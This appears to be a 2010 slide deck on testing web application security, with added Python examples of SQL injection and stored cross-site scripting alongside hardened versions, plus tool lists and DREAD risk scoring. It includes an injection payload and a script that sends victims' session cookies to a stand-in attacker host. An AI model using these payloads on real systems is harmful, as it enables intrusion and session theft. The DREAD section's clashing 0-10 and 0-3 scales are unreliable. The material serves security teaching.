Hands-on Demonstration for Testing Security in Web Applications. Aaron Weaver, August 2010
Agenda
• What kind of application security vulnerabilities should be tested?
• Methodology for testing
• Open source tools available
• Prioritizing application security defects
In the news...
The Solution?
And no, not in the Cloud!
Web Application Security Testing
OWASP Top 10 list
Top attacks: SQL Injection, Cross-Site Scripting, Authentication
SQL Injection
1. Application presents a form to the attacker (fields: Account, SKU)
2. Attacker sends an attack in the form data. Account field: ' OR 1=1--
   Resulting query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user
Result shown in the Account Summary: every row of the accounts table, Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293
(Diagram: the HTTP request passes the network-layer firewalls, hardened OS, web server and app server unchanged; the attack lives in the application layer, in custom code, and reaches the database behind the business functions such as Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt and E-Commerce.)
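The five steps above, run end to end as an added example (not code from the slides): a constructed in-memory SQLite table holding the four account numbers from the Account Summary, the vulnerable string-built query beside a parameterized one, and the attacker's Account-field value from step 2. The SKU values are made up.

```python
# Added example (not from the slides): the SQL injection steps run against an
# in-memory SQLite database. The table is constructed here; the account numbers
# are the ones shown on the Account Summary slide, the SKU values are invented.
import sqlite3

ACCOUNTS = [
    ("5424-6066-2134-4334", "SKU-1001"),
    ("4128-7574-3921-0192", "SKU-1002"),
    ("5424-9383-2039-4029", "SKU-1003"),
    ("4128-0004-1234-0293", "SKU-1004"),
]

# Step 2: what the attacker types into the Account field of the form.
INJECTION = "' OR 1=1--"


def make_db():
    """Build the constructed accounts table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct TEXT PRIMARY KEY, sku TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", ACCOUNTS)
    return conn


def build_vulnerable_query(acct):
    """Step 3 (vulnerable): the form value is pasted into the SQL text, so the
    attacker's quote closes the string and the -- comments out the trailing quote."""
    return "SELECT * FROM accounts WHERE acct='" + acct + "'"


def account_summary_vulnerable(conn, acct):
    """Steps 3-5 (vulnerable): whatever the concatenated query selects goes back to the user."""
    return conn.execute(build_vulnerable_query(acct)).fetchall()


def account_summary_parameterized(conn, acct):
    """Hardened lookup: the driver binds the value, so the quote and the -- are
    compared as literal characters of an account number, never parsed as SQL."""
    return conn.execute("SELECT * FROM accounts WHERE acct=?", (acct,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(INJECTION))
    print("vulnerable:    ", account_summary_vulnerable(db, INJECTION))   # all four rows
    print("parameterized: ", account_summary_parameterized(db, INJECTION))  # no rows
```

The parameterized version returns nothing for the injected string because no account is literally named `' OR 1=1--`; the vulnerable version returns the whole table, which is exactly the Account Summary the slide shows.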
Cross-Site Scripting (stored)
1. Attacker sets the trap: "update my profile". The attacker enters a malicious script into a web page that stores the data on the server (an application with a stored XSS vulnerability, in its custom code).
2. Victim views the page and sees the attacker's profile. The script runs inside the victim's browser with full access to the DOM and cookies.
3. The script silently sends the attacker the victim's session cookie.
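The three steps above as an added example (not code from the slides): a dictionary stands in for the application's profile database, the vulnerable renderer is shown beside one that HTML-encodes on output, and a small check a tester can run over a captured response. The attacker's bio text and the host attacker.invalid are constructed.

```python
# Added example (not from the slides): stored XSS, vulnerable and hardened
# rendering. PROFILE_STORE stands in for the server-side database; ATTACKER_BIO
# and the host attacker.invalid are constructed for illustration.
import html
import re

PROFILE_STORE = {}

# Step 1: the script the attacker saves in the bio field of their own profile.
# When it runs in a victim's browser it ships document.cookie to the attacker.
ATTACKER_BIO = ("<script>new Image().src="
                "'http://attacker.invalid/c?'+document.cookie</script>")

PAGE_TEMPLATE = '<html><body><h1>Profile</h1><div class="bio">%s</div></body></html>'

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def update_profile(user, bio):
    """Step 1: the application stores the submitted bio without validation."""
    PROFILE_STORE[user] = bio


def render_profile_vulnerable(user):
    """Step 2 (vulnerable): stored text is dropped straight into the page, so the
    browser of every victim who views the profile parses and runs the script."""
    return PAGE_TEMPLATE % PROFILE_STORE[user]


def render_profile_hardened(user):
    """Hardened: HTML-encode on output. The markup is displayed as text, not executed."""
    return PAGE_TEMPLATE % html.escape(PROFILE_STORE[user], quote=True)


def contains_live_script(page):
    """Tester's check on a captured response: is there an un-encoded <script tag?"""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    update_profile("attacker", ATTACKER_BIO)
    print(render_profile_vulnerable("attacker"))   # script tag intact: executes
    print(render_profile_hardened("attacker"))     # &lt;script&gt;...: inert text
```

Two caveats a tester should keep in mind: `html.escape` is the right encoding for element content and quoted attribute values only, not for text placed inside a script block or a URL; and step 3 depends on the script being able to read `document.cookie`, which a cookie flagged HttpOnly denies even when a script does run.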
Authentication
Tools Overview
Tools
• Proxies: Burp Suite, Paros, WebScarab, Fiddler; FoxyProxy browser plugin for switching the browser to a proxy
• Open source scanners: Skipfish
Burp Suite http://portswigger.net/proxy/
FoxyProxy Browser Plugin https://addons.mozilla.org/en-US/firefox/addon/2464/
Skipfish: a fully automated, active web application security reconnaissance tool. Detects, among other things:
* Server-side SQL injection (including blind vectors, numerical parameters).
* Stored and reflected XSS
* Directory listing bypass vectors.
* External untrusted embedded content.
http://code.google.com/p/skipfish/
Cheat Sheet
Quick Cheat Sheet
AppSec Tools Demonstration
Prioritizing
Threat Risk: DREAD
Damage potential
• If a threat exploit occurs, how much damage will be caused?
◦ 0 = Nothing
◦ 5 = Individual user data is compromised or affected.
◦ 10 = Complete system or data destruction
Reproducibility
• How easy is it to reproduce the threat exploit?
◦ 0 = Very hard or impossible, even for administrators of the application.
◦ 5 = One or two steps required, may need to be an authorized user.
◦ 10 = Just a web browser and the address bar is sufficient, without authentication.
Exploitability
• What is needed to exploit this threat?
◦ 0 = Advanced programming and networking knowledge, with custom or advanced attack tools.
◦ 5 = Malware exists on the Internet, or an exploit is easily performed, using available attack tools.
◦ 10 = Just a web browser
Affected Users
• How many users will be affected?
◦ 0 = None
◦ 5 = Some users, but not all
◦ 10 = All users
Discoverability
• How easy is it to discover this threat?
◦ 0 = Very hard to impossible; requires source code or administrative access.
◦ 5 = Can figure it out by guessing or by monitoring network traces.
◦ 9 = Details of faults like this are already in the public domain and can be easily discovered using a search engine.
◦ 10 = The information is visible in the web browser address bar or in a form.
Scoring
D + R + E + A + D = Total. Each factor is scored 0-3, so the total ranges from 0 to 15.
Severity Rating (by DREAD total)
• Low: 1-7
• Medium: 8-10
• High: 11-14
• Critical: 15
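The scoring and severity bands above as an added example (not code from the slides): each factor is rated 0-3 as on the Scoring slide, totals are banded as on the Severity Rating slide, and a list of findings is ranked highest risk first. The sample findings and their scores are constructed for illustration; a total of 0 is not on the slide and is treated as Low here.

```python
# Added example (not from the slides): DREAD scoring and severity banding as a
# small ranking tool for prioritizing defects. SAMPLE_FINDINGS and their scores
# are constructed for illustration.
FACTORS = ("damage", "reproducibility", "exploitability",
           "affected_users", "discoverability")
MAX_PER_FACTOR = 3  # Scoring slide: each factor 0-3, total 0-15


def dread_total(scores):
    """Sum the five factors, rejecting missing factors or values outside 0-3."""
    missing = [f for f in FACTORS if f not in scores]
    if missing:
        raise ValueError("missing DREAD factors: %s" % ", ".join(missing))
    total = 0
    for name in FACTORS:
        value = scores[name]
        if not isinstance(value, int) or not 0 <= value <= MAX_PER_FACTOR:
            raise ValueError("%s must be an integer 0-%d, got %r"
                             % (name, MAX_PER_FACTOR, value))
        total += value
    return total


def severity(total):
    """Bands from the Severity Rating slide. A total of 0 is not on the slide;
    treating it as Low is an assumption made here."""
    if total >= 15:
        return "Critical"
    if total >= 11:
        return "High"
    if total >= 8:
        return "Medium"
    return "Low"


def prioritize(findings):
    """Return (name, total, severity) tuples sorted highest risk first."""
    ranked = []
    for name, scores in findings.items():
        total = dread_total(scores)
        ranked.append((name, total, severity(total)))
    ranked.sort(key=lambda r: r[1], reverse=True)
    return ranked


# Constructed scores for the attacks shown earlier in the deck plus one
# authentication finding; adjust to your own assessment.
SAMPLE_FINDINGS = {
    "SQL injection in account lookup": dict(
        damage=3, reproducibility=3, exploitability=3, affected_users=3, discoverability=3),
    "Stored XSS in profile bio": dict(
        damage=2, reproducibility=3, exploitability=2, affected_users=3, discoverability=2),
    "Login form allows unlimited password guesses": dict(
        damage=2, reproducibility=3, exploitability=2, affected_users=2, discoverability=1),
}


if __name__ == "__main__":
    for name, total, band in prioritize(SAMPLE_FINDINGS):
        print("%-45s %2d  %s" % (name, total, band))
```

Because only five factors of 0-3 feed the total, two findings tie easily; when they do, break the tie on Damage potential and Affected Users rather than on the order they were reported.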
Other threat risk modeling approaches: STRIDE (Microsoft), OWASP Risk Ranking, Trike, CVSS
Questions?
Thanks!